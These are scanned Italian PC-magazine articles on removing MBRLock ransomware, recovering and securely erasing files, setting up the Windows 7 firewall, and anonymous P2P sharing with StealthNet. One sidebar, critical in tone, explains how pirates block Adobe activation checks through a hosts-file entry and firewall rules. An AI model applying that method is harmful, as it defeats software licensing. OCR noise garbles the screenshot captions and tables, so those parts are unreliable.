A volte ritornano 

È il caso del trojan MBRLock, il virus che 
prende di mira il Master Boot Record, il 
settore zero del disco rigido che serve ad 
avviare il sistema operativo. Isolato per la 
prima volta nel 2010 e tornato alla ribalta 
nel corso di quest'anno, MBRLock fa parte 
della seconda categoria di trojan ransom¬ 
ware, quelli che spaventano l'utente ma 
che fortunatamente non procurano nessun 
danno al sistema. Il normale codice del 
Master Boot Record viene sostituito con 
il codice del trojan, al fine di mostrare un 
messaggio all'avvio del sistema operativo in 
cui, spacciandosi per la Microsoft, avverte 
che la licenza d’uso del sistema operativo è 
scaduta ed è necessario acquistare (a caro 
prezzo) un nuovo codice di attivazione chia¬ 
mando un numero italiano a pagamento, 
iniziarne con il famigerato prefisso 899. 
Trojan.MBRLock è un perfetto esempio di 
utilizzo di tecniche di ingegneria sociale: il 
trojan, infatti, non blocca l'accesso ai dati, 
né li cancella o li cripta, ma previene sola- 


IDENTTTÀ DEL VIRUS 

Le principali caratteristiche tecniche di MBRLock 


Ncn» Trojan.MBRLock 
Nao, 29 aprile 2011 
Afa6 output.exe 


Tpctos* Trojan 
Lu^auarfsticne Variabile 
astoni wSwnbt Windowe 9x/ME/200.Q/.. 
XP/Vlsta/7 
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«arata*» Media .. 

Dan casa. . 

Musmè Bassa 

Segipatatai Spacciandosi per 
Microsoft annuncia la scadenza 
della licenza di Windows 
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Così contrastiamo l’infezione 

Bastano pochi passi per rimuovere MBRLock dal nostro computer. E per il futuro prendiamo le giuste 
contromisure per proteggere i nostri dati e non cedere ai ricatti dei pirati informatici. 


1 Manteniamo la calma e cerchiamo 
di capire cos’è successo 

Purtroppo, come detto in precedenza, i casi di 
infezione da ransomware sono molto più frequen¬ 
ti di ciò che si pensa, e non sono sempre così 
facili da rimuovere. Se il vostro PC cade vittima 
di un'infezione da ransomware, le procedure da 
seguire sono sempre molto diverse tra di loro: 
potrebbe trattarsi di un’infezione conosciuta e 
non dannosa, di una recuperabile, oppure potreb¬ 
be trattarsi di una seria infezione che non per¬ 
mette di recuperare i dati se non esclusivamente 
pagando il relativo riscatto richiesto. I sintomi per 
capire la presenza di un'eventuale infezione da 
ransomware sono vari: potrebbe comparire un 


-* — ATTENTION!!!!!! 

— ALL Y<WR PERSONAL FILES WERE ENCRYPTED 

» * wvni A STRONG ALGORYTHM RSA-1024 

— AND YOU CAN'T GET AN ACCESS TO THEM 
4 if WTHOUT MAKING OF WHAT WE NEED! 

« n READ *HOW TO DECRYPT TXT-FILE 
” - ON YOUR DESKTOP FOR DETAILS 


— JUST DO IT AS FAST AS YOU CANI 

Hi E 

- • REMEMBER; DON'T TRY TO TELL SOMEONE 
„. ABOUT THIS MESSAGE IF YOU WANT TO GET 
-a- YOUR FILES BACKI JUST DO ALL WE TOLD. 
f> Sf 


messaggio di richiesta riscatto sul desktop, in un 
file di testo, oppure lo sfondo del desktop viene 
cambiato con uno sfondo speciale contenente la 
richiesta di riscatto. Oppure, ancora, viene inse¬ 
rita una richiesta di riscatto in ogni cartella del 
disco fisso contenenti i dati che sono stati crit- 
tografati. In ognuno di questi casi l'unico consi¬ 
glio valido è quello di spegnere immediatamen¬ 
te il PC staccando la spina della corrente o pre¬ 
mendo manualmente il tasto di spegnimento del 
computer. Questa procedura, solitamente sconsi¬ 
gliata perché rischia di danneggiare il sistema, in 
caso di infezioni da ransomware potrebbe risul¬ 
tare molto efficace perché interrompe il lavoro 
di analisi del disco fisso da parte del trojan alla 
ricerca dei dati da crittografare. 


2 Una cassetta del pronto soccorso 
sempre a portata di mano 

Fatto questo, si può provare ad effettuare una 
scansione del PC tramite un Live CD Antivirus, 
come ad esempio il Kaspersky Rescue Disk, sca¬ 
ricabile gratuitamente da Win Extra. Per creare 
il CD, scompattiamo l’archivio Rescue-Disk.zip 
per accedere all'immagine kavjescueJO.iso. 
Avviamo Nero Burning Rom e masterizziamola 
su un CD vergine cliccando Masterizzatore/Scri- 
vi immagine. 



3 Aggiorniamo l’antivirus ed effettuiamo 
una scansione del sistema 

In caso di infezione da virus, inseriamo il Rescue 
Disk nel sistema da controllare e riavviamo il PC 
dal CD (accediamo al BIOS premendo Cane, da 
Boot/Boot Driver Order selezioniamo DVD-ROM 



Scansione del Computer 

Esamina il computer alla ricerca di virus. Trojan tpyware e altre mina 

ja Avvia Scansione Personalizzata 

jMl, Processo arrestalo ta 


f? yjfc Settori di avvio del disco 
f7 fg Oggetti di avvio nascosti 

r ite 


e confermiamo con FIO). Nella schermata di 
Kaspersky, premiamo Invio e selezioniamo Ita¬ 
liano. Lasciamo la prima opzione seleziona¬ 
ta ( Modalità grafica) e premiamo ancora Invio. 
Attendiamo che il processo di caricamento ter¬ 
mini: quando appare la schermata relativa alla 
licenza d'uso, premiamo >1 per accettarla e acce¬ 
dere all’interfaccia principale del programma. 
Automaticamente, il Rescue Disk scaricherà le 
firme virali aggiornate, per garantire sempre la 
massima protezione. Verrà quindi mostrata la 
schermata per effettuare la scansione del siste¬ 
ma. Per impostazione predefinita, solo i settori di 
avvio e gli oggetti nascosti archiviati nell'hard disk 
verranno analizzati. Se lo desideriamo, spuntiamo 
tutte le voci presenti per un controllo completo. 


4 Avviamo la scansione e facciamo 
piazza pulita del virus 

Una volta deciso su quali oggetti effettuare il con¬ 
trollo, clicchiamo sulla voce in alto Avvio Scansio¬ 
ne Personalizzata A seconda delle opzioni sele¬ 
zionate al passo precedente, questo controllo 


[^Kaspersky Restue Disk , 

,, , * Oi'fl'K'UPna 4 Rapp 

Kaspersky 

Resene Disk 


Scansione Personalizzata j" Aggiornamento , 

Scansione del Computer 

Esamina il computer alla ricerca di virus. Trojan ipyvraa e am 

M Interrompi Scansione Personalizza! 

miti Tempo residuo sconosciuto, oggetto drrfsda 

Settori di avvio dei disco 
Oggetti di avvio nascosti 




potrebbe durare anche diversi minuti. Attendia¬ 
mo che venga completato. Al termine della scan¬ 
sione, possiamo vedere i risultati dei file messi in 
quarantena, le minacce rilevate e i virus eliminati 
semplicemente cliccando in alto su Minacce rile¬ 
vate e su Rapporto 


mente il caricamento del sistema operativo. 
Ma tanto basta a spaventare l’utente medio, 
mettendolo in allarme e convincendolo ad 
effettuare la "carissima” telefonata. Il trojan 
è programmato per capire la provenienza 
geografica del PC infetto, al fine di mostrare 
numeri di telefono differenti e specifici ed 
è interessante notare come gli utenti mag¬ 


giormente presi di mira siano quelli italiani, 
austriaci, svizzeri e belgi. Fortunatamente 
il codice di sblocco richiesto da MBRLock 
non è complesso. Il meccanismo di verifica 
usato dal trojan, infatti, controlla solo la 
lunghezza del codice inserito: se si inserisce 
un qualsiasi codice di 14 cifre, il trojan lo ac¬ 
cetta, si auto-rimuove e consente il normale 


avvio del sistema operativo. Insomma, una 
grande paura ma fortunatamente nient’al- 
tro. Tuttavia, l’unico vero modo effettivo 
di contrastare tali infezioni è quello di ef¬ 
fettuare costantemente backup dei propri 
dati, perché la prossima volta potremmo 
non essere così fortunati e il trojan potrebbe 
essere molto più "duro a morire"! 
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spio da PC 


I File cancellati recuperali così I 



N el computer sono certamente archiviati 
centinaia di file a cui teniamo molto: 
foto di famiglia, documenti di lavoro, 
le nostre canzoni preferite... Non vogliamo 
neanche pensare alla possibilità di perderli. 
Ma purtroppo una cancellazione accidentale 
non è affatto un’eventualità così remota: 
basta un attimo di distrazione, un clic di 
troppo e i file sono belli che cancellati! Prima 
di strapparci le vesti colti da un improvvi¬ 
so attacco di disperazione, però, proviamo 
a recuperarli con Ashampoo Undeleter. Il 
programma, integra un’efficace funzione di 
ricerca che genera l’elenco di tutti i file can¬ 
cellati che possono ancora essere recuperati 
completamente o parzialmente,’anche da 
hard disk esterni, pendrive e altri supporti 
di memorizzazione. 

Sarà poi possibile recuperare il file deside¬ 
rato con un solo clic. Non perdiamo altro 
tempo, allora, e avviamo subito le operazioni 
di recupero! 


occorre 


SOFTWARE Dt 
RECUPERO FILE 

ASHAMPOO 
UNDELETER 1.00 

Lo trovi su: *fCD 

fctoaiWrtiwiMUd» 

Sito Internet: 

www.ashampoo.com 
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K, i cancellati: 

così ! 


La soluzione per non doversi 
più preoccupare della perdita 
accidentale di file importanti 


lina semplice procedura guidata 

Scompattiamo l’archivio Ashampoo.zipeó 
eseguiamo ilfile ashampoo_undeleter_ 1.00 
_9033.exe contenuto al suo interno per 
avviare l'installazione. Nella prima schermata lascia¬ 
mo selezionato Italiano, clicchiamo OK, poi Avanti, 
accettiamo la licenza d’uso e premiamo Avanti. 















I File cancellati recuperali così I 


Ti spio da PC Cr 



Evitiamo il superfluo 

H Nella schermata successiva attiviamo l'opzio¬ 
ne Installazione personalizzata e togliamo il 
segno di spunta da Installazione MyAsham- 
poo Toolbar, automaticamente verrà tolta anche dalle 
' opzioni successive. Lasciamo attiva la voce Tutti gli 
utenti e procediamo con Avanti. 


E adesso registriamoci 

1 Partirà la procedura guidata di installazione, 
che durerà solo pochi secondi. Al termine, 
attiviamo la connessione a Internet e clicchia- 
mo Fine. Verremo reindirizzati alla pagina di registra¬ 
zione del software. Indichiamo il nostro indirizzo e-mail 
e dicchiamo Send . 


Ecco il codice seriale 


a Riceveremo una nuova e-mail da MrReg@ 
ashampoo.com. Clicchiamosul link Confirm 
contenuto nel testo del messaggio: verrà 
caricata una nuova pagina Web con il codice di regi¬ 
strazione di Undeleter. Selezioniamolo, copiamolo 
(Ctrl+Q e avviamo Ashampoo Undeleter. 
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Adesso siamo operativi 

Incolliamo il codice (Ctrl+Vi in Inserisci il codi¬ 
ce di licenza qui clicchiamo Aff/Va, Continua 
e clicchiamo No grazie per non installare la 
versione premium di Undeleter e chiudere la pagina 
pubblicitaria. Comparirà così l'interfaccia principale del 
software. 


Un elenco dei danni 

0 Dal menu a tendina in alto selezioniamo 
| l’unità di memorizzazione da cui recupe¬ 
rare i file cancellati per errore (purché non 
siano stati sovrascritti con altri dati) e clicchiamo 
Ricerca. Il programma eseguirà un'attenta analisi 
alla ricerca dei file cancellati. 


Cosa possiamo recuperare? 

B ÀI termine, apparirà la lista dei file che sono 
stati salvati (ad esempio su una chiavetta) e 
poi cancellati, mentre a destra vedremo il loro 
stato. Alcuni sono irrimediabilmente perduti (Perso), 
ma la maggior parte può ancora essere salvata (Giu¬ 
sto o Buono) 
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Diamo inizio alle operazioni 

B Scorriamo la lista alla ricerca del file cancel¬ 
lato e mettiamo la spunta nella casella corri¬ 
spondente. Ovviamente, possiamo anche 
effettuare un recupero multiplo indicando tutti i conte¬ 
nuti che ci interessano. Quando siamo pronti, clicchia¬ 
mo Ripristina. 


Una cartella d’emergenza 

In Cerca cartella indichiamo il percorso in 
cui archiviare itile recuperati dalla pendri- 
ve. Per comodità, scegliamo Desktop e 
confermiamo cliccando sul pulsante OK. Pochi 
secondi e Undeleter avrà fatto il suo dovere! Clic¬ 
chiamo OK nella schermata di conferma. 



Ecco i nostri file! 

| Sul Desktop c’è adesso una cartella con lo 
stesso nome di quella che ospitava origina¬ 
riamente i file (nel nostro caso, Tempi Non 
ci rimane altro da fare che chiudere Ashampoo Unde¬ 
leter e usare le immagini come se la cancellazione 
non fosse mai avvenuta! 



Speciali Win Magazine 79 



























































































C Ti spio da PC 


Security Analyzer - Secure Eraser I 



Testiamo il livello di protezione del nostro PC e chiudiamo 
le eventuali falle riscontrate. Cancelliamo definitivamente file 
e cartelle dal disco rigido, impedendone il recupero 


15 ► Security Analyzer 

Il software lo trovi sul 

✓CO J 



► Secure Eraser 

Il software lo trovi sul 1 

✓CO 


PC A PORTE CHIUSE 

Per una protezione completa del PC, è necessario impiegare l’antivirus, 
il firewall, l’antispyware ecc. Security Analyzer ci aiuta a sbarrare le porte 
di Windows 7 indicando cosa manca e quali impostazioni correggere. 



Doppia estrazione 

. ! Estraiamo sul Desktop 
|ì | l'archivio SecurityAnaly- 
C# zer.zip (presente sul Win 
CD-Rom), apriamo la cartella 
saep e awiamo il file Security 
Analyzer 2.0 Extract Program, 
exe Rispondiamo S/alla richie¬ 
sta di autorizzazioni, clicchiamo 
Browse e indichiamo nuova¬ 
mente il Desktop come percor¬ 
so di estrazione (Extract) 


RECUPERI IMPOSSIBILITATI 

Anche svuotando il cestino, con appositi tool è possibile recuperare i file 
cancellati dall’hard disk. Per eliminarli definitivamente usiamo Secure 
Eraser, che ci libera anche da file temporanei e chiavi di registro obsolete. 

Installiamo il software 

| Estraiamo l’archivio Se- 
ì | cureEraser.zip (presen- 
'****? te sul Win CD-Rom) e 
avviamo il file sEraser.exe. Ri¬ 
spondiamo Sì alla richiesta del 
prompt UAC, clicchiamo su OK 
e proseguiamo con Next. Spun¬ 
tiamo l’opzione / accept thè 
agreement, clicchiamo 4 volte 
su Next, confermiamo con Instali 
e completiamo con Finish 



Via al test 

| Apriamo la cartella Security 
Analyzer2.0e facciamo doppio 
w clic sul file Security Analyzer 
2.0.exe. Rispondiamo S/alla richiesta 
di autorizzazioni, spuntiamo / accept 
thè terms of this agreement e clic¬ 
chiamo Continue Selezioniamo English 
(US) e confermiamo con Save. Il test 
richiede pochi secondi, dopodiché i 
risultati ci diranno dove agire per au¬ 
mentare il livello di protezione. 





U Security Analyzer 2.0 
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Sbarriamo le porte 

\ Quelle colorate di verde sono le 
i sezioni che non richiedono par- 
: ticolari accorgimenti. Nel caso ci 
fossero dei problemi, la relativa sezione 
sarà evidenziata in giallo o in rosso e 
presenterà un pulsante con cui porvi 
rimedio. Clicchiamo i pulsanti ( Tum on 
nowo Change setting now ) per attiva¬ 
re gli strumenti di protezione di Windows 
e rispondiamo Sì se richiesto. 


File al macero 

^ i;Citrovererr)igjdirettamentenel- 
£ | la sezione File Deletion del 
- -J software. Clicchiamo Addfiles 
o Add folder per indicare rispettiva¬ 
mente il percorso dei file o delle car¬ 
telle da eliminare e avviamo l’opera¬ 
zione con Start deletion Spostando¬ 
ci in Space Deletion e selezionando 
un disco, possiamo sovrascrivere lo 
spazio libero dell'intero disco renden¬ 
done irrecuperabili i dati. 
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Ripuliamo sistema e registro 

l Dalla sezione System Cleaning 
3 ! possiamo liberare spazio sul disco 
KmJ rimuovendo i file temporanei. La¬ 
sciamo selezionate tutte le caselle, clic¬ 
chiamo Start deletion e scegliamo High 
German standard come metodo di sovra- 
scrittura (Sì, l. Per finire, spostiamoci in 
Registry Cleaning. clicchiamo Start Scan¬ 
ning e facciamo piazza pulita delle chiavi 
obsolete con Start deletion (Sì). 


fii Tag imbarazzanti 

Vogliamo evitare che foto Indesiderate in cui siamo stati taggati 
finiscano in bella mostra sulla bacheca del nostro profilo Facebo- 
ok? Dal menu Account selezioniamo Impostazioni sulla privacy e 
poi Personalizza impostazioni. Scorriamo l’elenco fino a individua 
re Foto e video in cui sei tappato, clicchiamo Modifica impostazio¬ 
ni. scegliamo Personalizzata e impostiamo Solo io. 


® File in cassaforte 

Crittare un file direttamente dal menu contestuale del tasto destro 
con un algoritmo più che sicuro: questo è quanto offre Protea- 
File, presente sul Win CD-ROM. Installiamo il software, clicchia¬ 
mo col tasto destro sul file da proteggere e scegliamo Protect ttiis 
file. Digitiamo la password in entrambi i campi e clicchiamo Pro¬ 
tect this file. 


0 Password a lunga scadenza 

In Windows 7. per modificare il periodo di validità della password 
degli account, o annullare la richiesta di modifica, digitiamo secpol. 
msc nella casella di ricerca del menu Stane premiamo Invio. Sele¬ 
zioniamo Criteri account/Criteri password, facciamo doppio clic 
su Validità massima password e indichiamo dopo quanti giorni 
l'utente dovrà cambiarla. Con 0. invece, annulliamo la richiesta. 
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alla dogana 


Impostiamo il firewall di Windows 
per bloccare i programmi che 
accedono al Web senza consenso 


Cosa ci 
occorre 


m. 




SOFTWARE DI 
RECUPERO FILE 

SISTEMA 
OPERATIVO 
WINDOWS 
CON FIREWALL 
INTEGRATO 

Quanto costa: € 339,00 
Sito Internet: 

www. microsoft.com/italy 



I l problema della sicurezza informatica 
e della tutela della privacy è una tema¬ 
tica che interessa da vicino chiunque si 
connetta ad Internet. La regola di base è non 
fornire mai in Rete i propri dati sensibili, se 
non tramite opportune modalità ritenute 
sicure. In alcuni casi, però, le stesse informa¬ 
zioni immagazzinate nel computer finiscono 
“autonomamente” in Rete, a nostra completa 
insaputa. È ciò che accade ad esempio con 
i trojan non rilevati dai software antivirali 
che, una volta in esecuzione, trasmettono 
dati dall’interno del sistema. La prevenzio¬ 
ne è sempre la stessa: armarsi di un buon 
firewall in grado di filtrare le connessioni 
sicure da quelle poco affidabili, controllando 
il traffico in entrata e soprattutto quello in 
uscita dal PC. 

Windows 7: sicurezza 10 e lode 

La politica adottata dal firewall di Windows, 
a partire dalla sua prima comparsa in XP, ha» 
subito una graduale evoluzione. In passato 
bloccava di default tutte le connessioni 
in ingresso, favorendo completamente il 
traffico in uscita senza alcun controllo. Con 
Windows 7 la situazione è radicalmente 
cambiata. L’ultima versione del sistema 
operativo di casa Microsoft integra infatti 
un firewall molto completo e duttile sotto il 
profilo delle impostazioni, che permette di 
definire delle regole per monitorare tutto il 
traffico dati generato dal computer. In que¬ 
sto modo, noi utenti abbiamo un controllo 
completo sull'operato delle applicazioni in 
esecuzione, con la possibilità di bloccare 
eventuali tentativi non autorizzati di fornire 
informazioni personali o dati riguardanti 
l’utilizzo dei software installati sul disco 
rigido. Ecco quindi come configurare il 
firewall di Windows 7 per bloccare le “talpe” 
dei pirati malintenzionati e delle software 
house troppo curiose! 











Configuriamo il firewall di Windows I 



Oltre l’utilizzo ordinario 

0 Andiamo in Start/Pannello di controllo e cucchiamo sulla 
; voce Sistema e sicurezza. Dall’elenco scegliamo Windows 
Firewall e nella finestra del programma che viene caricato 
facciamo clic su Impostazioni avanzate (nella barra laterale di sinistra) 
per accedere al pannello di configurazione delle regole del firewall. 




Creiamo una regola in uscita... 

a L’interfaccia si presenta divisa in tre sezioni verticali: cicchia¬ 
mo su Windows Firewall con sicurezza avanzata in Computer 
locale (presente nella parte sinistra dello schermo) e dalla 
struttura ad albero selezioniamo Regole di connessione in uscita. Dal¬ 
la colonna Azioni (nella sezione a destra) scegliamo Nuova regola. 
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... per bloccare il sospetto 

Nella procedura guidata di creazione della regola selezio¬ 
niamo la voce Programma e clicchiamo su Avanti. Faccia¬ 
mo clic su Percorso programma e premiamo Sfoglia: 
specifichiamo il percorso in cui è presente l'eseguibile del softwa¬ 
re di cui vogliamo inibire l’accesso ad Internet e scegliamo Avanti. 


Da qui, non si passa più! 

B Nella scheda Operazioni selezioniamo Blocca la connessio¬ 
ne e continuiamo mettendo nella schermata Profilo il segno 
dì spunta sulle voci Dominio, Privato e Pubblico. Terminiamo 
la procedura di creazione della regola inserendo un Nome e una 
Descrizione per la regola creata e facciamo clic sul pulsante Fine. 



CONTROLLO 

COMPLETO 

Grazie all'Integrazione 
di nuove funzioni, il 
firewall di Windows 7 è 
migliorato rispetto alle 
versioni preinstallate 
nelle precedenti edizioni 
di Windows. Tuttavia, 
se non siamo ancora 
soddisfatti del livello 
di personalizzazione 
concesso da Microsoft, 
possiamo installare il 
tool Windows 7 firewall 
Control (www.sphinx- 
soft.com). Si tratta 
di un'estensione del 
firewall di Windows che 
consente di aggiungere 
interessanti funzionalità 
tra le quali un maggiore 
controllo degli accessi e 
una gestione interattiva 
delle applicazioni che si 
collegano ad Internet. É 
disponibile per sistemi 
operativi a 32 bit e 64 
bit ed è installabile nella 
versione Free o in versio¬ 
ne Plus a pagamento che 
consente di estendere 
ulteriormente le possibi¬ 
lità di configurazione del 
Firewall di Windows 7. 


COSÌ I PIRATI USANO IL FIREWALL DI WINDOWS 7 


I pirati informatici, sfruttando bug, falle 
di sicurezza ed eseguendo il reverse 
engineering dei software commerciali 
riescono a realizzare i cosiddetti “crack”, 
rilasciati poi sui canali underground della 
Rete a disposizione di tutti i pirati. Il più 
delle volte creano un nuovo eseguibile 
del programma dopo aver eliminato la 
routine di registrazione da quello origi¬ 
nale; altre volte estrapolano l’algoritmo 
per compilare un keygen che consente 
loro di generare seriali accettati dai pro¬ 
gramma come validi. Insomma, la lotta 
tra software house e pirati è sempre 
accesa; tant’è che le prime si impe¬ 
gnano ad introdurre sistemi antipirateria 
via via più sofisticati, come chiavi di 
protezione hardware e controlli di ge¬ 


nuinità su server remoti. In particolare, 
questi ultimi si eseguono all’avvio del 
software e in presenza di connettività 
Internet. Molte applicazioni integrano il 
controllo della licenza nella procedura 
di update del software; in questo modo, 
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Enter in* uri¬ 


co to C : Windows *y*t#«3 
Th«r« should t>* a *11# r 


Ì #*32 driver* «tC. 
a namad: Mesti 
Doublé click, and open u «un «ot#pad. 
m#n should be sonetMng Itk# tMi In thè botte* 


wake #ore Uttt 1t look* lite thls: 

127.0.0.1 locai ho*t 

127.0.0.1 attivate.aoob#.con 

::1 locaihost 

- *ow click #1le> Save 

- Finish (he pf-ocoshop CSA Instai Ter 

- S/vjoy 1 


quando l’utente verifica la disponibilità di 
nuove versioni viene obbligatoriamente 
controllata la genuinità del programma 
installato nel PC. Studiamo un caso spe¬ 
cifico: Adobe Creative Suite 4.1 pirati, 
dopo aver applicato il crack al software, 
provvedono a bloccare nel file hosts di 
Windows XP i controlli di genuinità rein¬ 
dirizzando al localhost del loro PC (che 
per tutti è 127.0.0.1) il collegamento al 
sito Adobe per l’attivazione dei prodotti. 
Con Windows Vista e Windows 7, invece, 
tale sistema non funziona e devono per¬ 
tanto ricorrere al firewall (anche quello 
integrato nel sistema operativo) creando 
una regola che blocca tutti i file EXE 
della suite Adobe. È così che riescono 
a compiere la loro malefatta: ottenere 



un costosissimo software commerciale, 
completamente a scrocco. La stessa 
sorte di Adobe è toccata a tutti gli altri 
programmi che adottano un sistema 
analogo. Insomma, ironia della sorte 
uno strumento perfettamente legale 
come il firewall di Windows 7, nella 
mani sbagliate diventa un pericoloso 
strumento di hacking. 
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lutti anonimi 
sul file sharing 

Scaricare dal P2P senza lasciar tracce e al riparo 
da occhi indiscreti? Con le nostre dritte si può fare! 


Cosa ci 
occorre 

i CLIENT P2P ANONIMO 

STEALTHNET 

Lo trovi su: l*fCD 

*• 1 Sito Internet: 

www.stealthnet.de 

PLAYER MULTIMEDIALE 

VLC 

Lo trovi su: VCD 

@2HB) 

Sito Internet: 

www.videolan.org 


I l maggior pregio di Internet? Ci ha sem¬ 
plificato la vita connettendoci al mon¬ 
do intero. Il suo peggior difetto? Ce l’ha 
complicata esponendoci a maggiori rischi. 
Un PC connesso ad Internet senza le dovute 
protezioni è come una casa lasciata sempre 
aperta alla mercé di tutti. Cyber criminali, 
major discografiche, agenzie governative, 
Internet Service Provider e aziende pubbli¬ 
citarie senza scrupoli sono interessati, per 
vari motivi, a spiare le nostre abitudini, per 
carpire dati sensibili su 1 nostro conto. Ed è in 
questo scenario alla “Grande Fratello" che si 
avverte ancor più l'esigenza di tutelare la pro¬ 


pria privacy: e in questo firewall e antivirus, 
purtroppo, non bastano. Fortunatamente, gli 
strumenti che ci consentono di navigare in 
maniera anonima esistono, ma cosa accade 
quando si usa un software di file sharing? 
In questi casi bisogna trovare soluzioni ad 
hoc, in quanto la maggior parte dei sistemi 
proxy adottati per la navigazione Web non 
assicurano l’anonimato con i client P2P. 

Il Client P2P “segreto” 

Tutti i tool di P2P anonimo esistenti (iMule, 
ANts P2P, Mute, OFFLOAI), Tornile...) non 
sono privi di difetti: troppo complessi da far 


funzionare; poco frequentati; troppo lenti... 
Tra i migliori che abbiamo provato c'è Steal- 
thNet, un software che si appoggia ad una 
nuova rete di noine RShare e si fa apprezzare 
per la sua semplicità d'uso, l’interfaccia in ita¬ 
liano, le funzionalità di résumé dei download 
interrotti e i filtri per la ricerca. In merito alla 
velocità, poi, StealthNet raggiunge un buon 
compromesso: bisogna sì attendere qualche 
minuto in più per avviare un download (ma 
questo è tipico di tutti i sistemi che puntano 
all’anonimato), ma in compenso nessuno, 
compreso l'ISP, sarà in grado di conoscere 
quali dati scambiamo in Rete. 



Aggiungere il Client al PC 

Installiamo StealthNet e configuriamo il Firewall di Windows per consentire l’accesso all’Innovativa rete RShare. 
In questo modo potremo scaricare ogni genere di file in completo anonimato. 



▲ Un Client in lingua italiana 

•J i Facciamo doppio clic sul file stealthi 


stealthnet_setup.exe che trovia¬ 
mo sul Win CD-Rom. La prima finestra a schermo che si aprirà, 
ci chiederà di scegliere la lingua d’installazione. Selezioniamo quindi 
Italiano e proseguiamo con OK (per funzionare, StealthNet richiede il 
componente Microsoft .NET Framework 2.0 o superiore, scaricabile 
da Windows Update). 


tf Avviso di sicurezza Windows 


N, 


Windows Frrewali ha bloccato alcune funzionalità del 
w programma 


Windows Firewall ha bloccalo alcune funzionalità d» StealthNet in tutte le reti pubbliche e 
private. 

Nome: StealthNet 

Autore: The StealthNet Team 

Percorso: C:\program fìles (x86}tetealthnet\stealthnet.exe 

Consenti a StealthNet di comunicare su queste reti: 

Reti private, ad esemplo una rete domestica o aziendale 

V Reti pubbliche, ad esempio in aeroporti e Internet caie (scelta non consigliata 
perché < livello di sicurezza di queste reo è spesso insuffioente o del tutto assente; 


La regola del Firewall 

2 I Proseguiamo con Avanti, accettiamo i termini di licenza e premiamo 
' Avanti , Installa e poi Fine. Al primo avvio di StealthNet, se abbiamo 
I Firewall di Windows attivo, una finestra ci avvertirà che l’applicazione sta 
cercando di comunicare con l’esterno e ci chiederà se concedere o meno 
l’accesso alla Rete. Spuntiamo entrambe le voci presenti nella finestra e 
premiamo Consenti accesso. 
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I Tutti anonimi sul file sharing I 


Ti spio daPCf^ 


Ottimizzare le prestazioni 

Apriamo le porte di comunicazione del router (nell’esempio il Pirelli Alice) e impostiamo la quantità di banda 
cne verrà utilizzata da StealthNet Potremo così scaricare dal P2P senza congestionare la navigazione Web. 



• Gestione Modem Alice 


•iy> 


— 


«1 

0 



^ Configuriamo il router 

I "| | In StealthNet cucchiamo Configurazioni e 
v*»/ annotiamo la Porta (6097). Colleghiamoci 
al panneHo di controllo del router Alice digitando 
192.168.1.1 nel browser e in Port Mapping/Vir- 
tual Server personalizzati scriviamo StealthNet in 
Nome. I IP locale del PC (ad esempio 192.168.1.2) 
in IP Destinazione, 6097 in Porta Interna e Porta 
Esterna e TCP in Tipo Porta. Premiamo Attiva, 


^ Meno banda in uoload 

2 i In StealthNet, la maggior parte delle Configu- 
* razioni sono già impostate in modo ottimale. 
Pertanto, interveniamo soltanto su Limite upload 
(Kbit/s). Attiviamo questa voce e specifichiamo la 
quantità di banda da dedicare al software: per evi¬ 
tare congestioni nella navigazione Web, settiamo un 
valore non superiore all'80% della banda in upload 
della nostra ADSL (200 Kbit/s vanno più che bene). 


▲ Condividiamo le cartelle 

3 1 Spostiamoci ora nella sezione Cartelle In 
Cartelle condivise possiamo aggiungere le 
directory che desideriamo condividere con gli altri 
utenti di StealthNet. Quella di default, Incoming, 
non può essere rimossa, ma è possibile inserirne 
altre cliccando Aggiungi Possiamo invece lasciare 
invariati i percorsi specificati in Altre cartelle (rela¬ 
tivi ai file di log, di configurazione ecc.). 





COME FUNZIONA RSHARE: LA RETE "SEGRETA" 


RShare è un progetto, sviluppato da Lars Regensbur- 
ger, che consente ai suoi utenti di condividere e 
scaricare file in completo anonimato, con una no¬ 
tevole semplicità d'uso; a differenza di altri network 
dedicati al P2P anonimo (iMule, ad esempio), infatti, 
non richiede complesse configurazioni, che il più 
delle volte scoraggiano gli utenti meno esperti. Ma 
cerchiamo di capire meglio come funziona RShare, 
per capire come possa garantirci l'anonimato. 

Nelle reti tradizionali di file sharing gli utenti possono 
essere tracciati a partire dai loro IP pubblici (assegnati 
dai provider ai momento della connessione), che 
risultano pertanto visibili (in chiaro) a tutti i par¬ 
tecipanti; inoltre, il P2P classico può prevedere la 
presenza di server centralizzati che si occupano di 
gestire il traffico dati e di archiviare tali informazioni 
o di un sistema di connessione diretta tra i vari utenti 
(strutture"serverless"). in RShare, invece, i servercen- 


C onnessione 


tralizzati non esistono e la connessione tra chi invia 
e chi scarica non avviene in maniera diretta: tutto il 
traffico viene incanalato attraverso una moltitudine 
di nodi. Ogni PC collegato alla rete è un"nodo"della 
stessa; quando viene svolta un'attività (scaricare file 
o eseguire ricerche) il nodo diventa un "peer". Ciò 
che si vede in chiaro sono gli IP dei nodi ai quali si è 
connessi direttamente (che mettono a disposizione la 


Downlo ad 


Ricerca 


loro banda per la rete), ma non si conosce l'IP del peer 
che detiene i file richiesti. Per identificare questi ultimi, 
infatti, non si ricorre agli indirizzi IP ma ai cosiddetti 
"RShare ID"e il traffico dati viene cifrato in modo tale 
che neanche l'ISP (Internet Service Provider) possa 
conoscere quali pacchetti vengono scambiati. 

Per eseguire la connessione alla rete si utilizzano le 
Webcache: non sono veri e propri server in quanto 
non memorizzano informazioni sui dati scambiati 
e sulle attività degli utenti, ma si limitano a creare 


le connessioni necessarie. In sostanza, quando un 
client accede alla rete stabilisce una connessione 
con diverse Webcache (1 ), che provvedono a loro 
volta a mettere in comunicazione l'utente con gli altri 
partecipanti della rete (2): fatto ciò, la connessione 
viene chiusa. L'utente che in questo modo ha ese¬ 
guito l'accesso diventa un nodo della rete. Quando 
si esegue una ricerca, questa viene passata ai nodi 
vicini (1 ) che a loro volta la inoltrano agli altri nodi (2). 
di tali ricerche vengono poi instradati ai nodi 
lo RShare ID dei Client che dispongono 
dei file: in questo modo, chi ha eseguito la ricerca, 
non riceverà mai i risultati in maniera diretta. 
Quando il client richiede il download, questa viene 
instradata attraverso diversi nodi fino ad arrivare a 
quello che possiede il file (1 ). I segmenti che lo tom 
pongono vengono poi fatti rimbalzare da un nodo 
all'altro, seguendo un percorso a ritroso, fino ad amva 
re al richiedente (2). Se un nodo del percorso diventa 
indisponibile, viene creato comunque un percorso 
alternativo per raggiungere il destinatario (3). 
























































IL CENTRO DI CONTROLLO DELLE OPERAZIONI 

Dall’interfaccia principale di StealthNet è possibile settare tutte le impostazioni del programma e definire in dettaglio 
